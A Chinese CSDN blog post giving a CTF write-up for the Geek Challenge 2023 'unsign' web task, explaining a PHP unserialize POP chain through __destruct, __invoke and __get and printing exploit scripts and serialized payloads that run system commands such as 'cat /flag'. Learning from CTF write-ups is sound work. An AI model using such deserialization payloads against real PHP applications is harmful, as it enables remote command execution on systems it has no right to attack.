Geek Challenge 2023 wp

最新推荐文章于 2024-06-18 14:11:29 发布
最新推荐文章于 2024-06-18 14:11:29 发布
阅读量669 收藏 12
点赞数 8
文章标签: java 前端 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74035288/article/details/134225662
版权

unsign

页面源码

<?php
highlight_file(__FILE__);
class syc
{
    public $cuit;
    public function __destruct()
    {
        echo("action!<br>");
        $function=$this->cuit;
        return $function();
    }
}

class lover
{
    public $yxx;
    public $QW;
    public function __invoke()
    {
        echo("invoke!<br>");
        return $this->yxx->QW;
    }

}

class web
{
    public $eva1;
    public $interesting;

    public function __get($var)
    {
        echo("get!<br>");
        $eva1=$this->eva1;
        $eva1($this->interesting);
    }
}
if (isset($_POST['url'])) 
{
    unserialize($_POST['url']);
}

?>

pop链思路,
首先找可以利用,最具攻击性的点,见web类中的eva1(this interesting),可以将ev1和intereting分别赋一个值共同组成一个漏洞执行函数。
(ps:这里我经过多次尝试,当构造eval(system ls )函数时,最后回显index.php中无eval函数,所以换函数,最后发现直接构造system(ls)就可以)
接着倒着找,想用web类中的eva1(this interesting)就得用get方法,而get是魔术方法,当传入的var变量不存在时自动调用,所以我们接着往上找,看怎么触发这一条件。
我们看到lover类中的this yxx qw,很明显,这种连续的赋值,很容易可以满足触发get的条件,将lover类中的this yxx赋值为web类,然后web类中无qw变量,所以触发get函数。
接着往上找,this yxx qw是在方法invoke里,如何触发invoke呢,当一个对象(类)被当做方法执行时,自动触发invoke,这个也很好找,很明显syc类中的fuction=this cuit,return function()可以利用,我们将cuit赋值为new lover类对象,然后我们看到fuction=this cuit,return function()是在destruct函数中,destruct魔法函数在unserialize反序列化时会自动触发,至此形成闭环

构造exp

<?php
class syc
{
    public $cuit;

}

class lover
{
    public $yxx;
    public $qw;
    public function __invoke()
    {
        echo("invoke!<br>");
        return $this->yxx->QW;
    }

}

class web
{
    public $eva1='system';
    public $interesting="(ls /);";

}
$a = new web();
$b = new lover(); 
$b ->yxx =$a;
$c =new  syc();
$c ->cuit =$b;


echo serialize($c);


?>

构造payload

url=O:3:"syc":1:{s:4:"cuit";O:5:"lover":2:{s:3:"yxx";O:3:"web":2:{s:4:"eva1";s:6:"system";s:11:"interesting";s:7:"(ls /);";}s:2:"qw";N;}}

页面回显

继续构造exp

<?php
class syc
{
    public $cuit;

}

class lover
{
    public $yxx;
    public $qw;
    public function __invoke()
    {
        echo("invoke!<br>");
        return $this->yxx->QW;
    }

}

class web
{
    public $eva1='system';
    public $interesting="(cat /flag);";

}
$a = new web();
$b = new lover(); 
$b ->yxx =$a;
$c =new  syc();
$c ->cuit =$b;


echo serialize($c);


?>

得到

O:3:"syc":1{s:4:"cuit";O:5:"lover":2{s:3:"yxx";O:3:"web":2{s:4:"eva1";s:6:"system";s:11:"interesting";s:12:"(cat /flag);";}s:2:"qw";N;}}

上传拿到flag

red芯
关注
  • 8
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Geek Challenge [SKRZAT]
07-04
Geek Challenge [SKRZAT] is an old, old game from Poland that uses a game console with two buttons plus a joy stick. As is true to its name, the game communicates in binary, so that one button ...
Geek Geek Geek
04-30
Geek
Geek Challenge 2023 Re
m0_75243362的博客
01-01 414
首先第一步还是老样子,得到一个exe,老规矩查壳​没壳之后就是无脑拖IDA,记住是然后就是看字符串,直接shift+12直接跟踪一手然后直接f5​​ 反汇编代码看起来还是挺简单的,简单分析一下就是得从0~999猜一个数作为key,然后将该数从0加到本身(此处从函数result中看得),而后将加完之后的结果v5对于0xD3取余,v4再与它异或即是最终结果。分析到此处后,大概的解题思路还是得爆破一手,写一个脚本从0一直试到999,而后查抄flag中的关键词“SYC”即可。
WPGeek Challenge 2023 web 部分wp
m0_63138919的博客
11-27 1599
本文为Geek Challenge 2023 第十四届极客大挑战 web 部分wp 本人纯菜鸟 ,只记录学习过程,后续题再看看大佬wp进行复现
2020第十一届极客大挑战——Geek Challenge部分wp
monster663的博客
10-26 3964
比赛正在进行中,本来只剩web没有AK,然后出了一波新题,先留一个坑,之后再填
GeekChallenge 2023 re wp
keine_beihai的博客
11-30 1162
GeekChallenge2023 re wp
Geek Challenge2022部分web题解
ph0ebus的博客
11-25 1009
进去之后看到一大堆代码,开始审计,可以发现就是绕过死亡exit()以及file_put_contents()的利用,这里还有一个exif_imagetype()的绕过,添加GIF89a文件头绕过即可。/bin目录下的cat文件,通配符只能代替文件,不能代替命令,每一个文件都有一个命令作为载体,用文件和用命令的原理一致,由此可以bypass cat从而获取到flag。可以看到输入的密码被编码了,看结构是哈希,盲猜一手md5,验证一下果然如此,那么开始爆破,给数字编码一下发包。然后使用联合注入,先找出回显点。
SICTF2023 misc-wp
网安小菜鸡
01-20 1275
misc杂项
[巅峰极客2023]wp复现
leekos的博客,分享web安全相关知识~
07-24 649
简单的说,就是通过查询多个大的表,导致产生笛卡尔积,造成查询数量多,所以会产生延时的效果。没写出这题的原因,以为只能通过逃逸改变属性值,结果可以反序列化对象里的对象。都被过滤了,我们怎么才能够一边查询多表导致笛卡尔积,一边进行盲注呢?等等,普通的延时注入肯定不行,关键词都被ban了。对象的序列化字符串,由于对象成员变量的权限是。序列化后字符串的形式了,接下来我们只需要闭合。,这个是8进制的写法,然后编码之后就能转为。的字符,该字符不可见(也算作一个字符)可以重复14次,就逃逸出28个字符了,
SICTF2023 WP
qq_63928796的博客
01-20 3150
highlight_file(__FILE__); error_reporting(0); class Happy{ private $cmd; private $content; public function __construct($cmd, $content) { $this->cmd = $cmd; $this->content = $content; } public function __call($name
2020第十一届极客大挑战——Geek Challenge(部分解)
热门推荐
weixin_45794666的博客
12-19 1万+
Crypto 二战情报员刘壮 考点:摩斯密码 通过 1.简介中直接看出是摩斯密码 2.通过在线网站直接解密得到flag 铠甲与萨满 考点:凯撒密码 1.通过题目和提示知道是凯撒密码 2.通过CrakTools直接解密找到SYC即可 成都养猪二厂 考点:猪圈密码,栅栏密码 1.[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w1bVRQgi-1608350560768)(http://image.liangyueliangyue.top/writeup-image/image
Reporter_8GEEK-wp模板
10-12
Reporter_8GEEK wp模板 非常不错 感谢下载 多多下载 多多下载
geek uninstaller(2023最新版)
08-07
内容概要:这是一个windows平台的专业卸载工具,它可以连带安装软件的注册表一同清理掉,也就是将软件的所有相关的文件全部删除,可真正的将安装软件连根拔起。 适用人群:想要深度删除软件的人,同时又对注册表...
geek 用来卸载流氓软件
05-07
卸载软件卸载的很干净 强烈安利~
(Javascript)AI数字人mp4转canvas播放并去除背景绿幕
lx_nhs的博客
06-12 525
去除前:去除后: 3、可能会出现的报错 (1)视频路径跨域问题:解决:vue开启代理
探讨 MyBatis 特殊 SQL 执行技巧与注意事项
最新发布
良月柒
06-18 250
/MyBatis 作为一个灵活的持久层框架,通过提供丰富的动态 SQL 标签、SQL 片段复用、存储过程调用、复杂结果集处理、分页查询和批量操作等功能,使开发者能够高效地实现各种复杂的 SQL 操作。
【仿真建模-anylogic】FlowchartPort原理解析
zhaoyaxuan001的博客
06-14 362
FlowchartPort是流图组件端口的基类,一般不会直接使用;如果需要自行封装组件库时会用到;FlowchartPort继承Port类,并定义了一系列抽象函数;用于输入端口判定此刻是否不能接收Agent。用于输出端口判定是否有Agent准备离开。判定端口是否发生错误。
盲盒App开发时有哪些技术框架可以借鉴
bytekj的博客
06-14 606
在开发盲盒App时,可以根据项目需求和团队技术栈选择合适的技术框架。前端可以选择微信小程序框架、React Native或Vue.js等;后端可以选择Node.js或Spring Boot等;数据库可以选择MySQL或MongoDB等。同时,还需要考虑缓存、消息队列、支付和物流接口等其他技术来完善应用的功能和性能。
geek unlnstaller官网
06-27
Geek Uninstaller是一款免费的软件卸载工具,其官网提供了最新版本的软件下载和详细的功能介绍。在官网上,用户可以下载到各种版本的Geek Uninstaller,包括免费版和Pro版。其中,免费版提供了基本的软件卸载功能,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值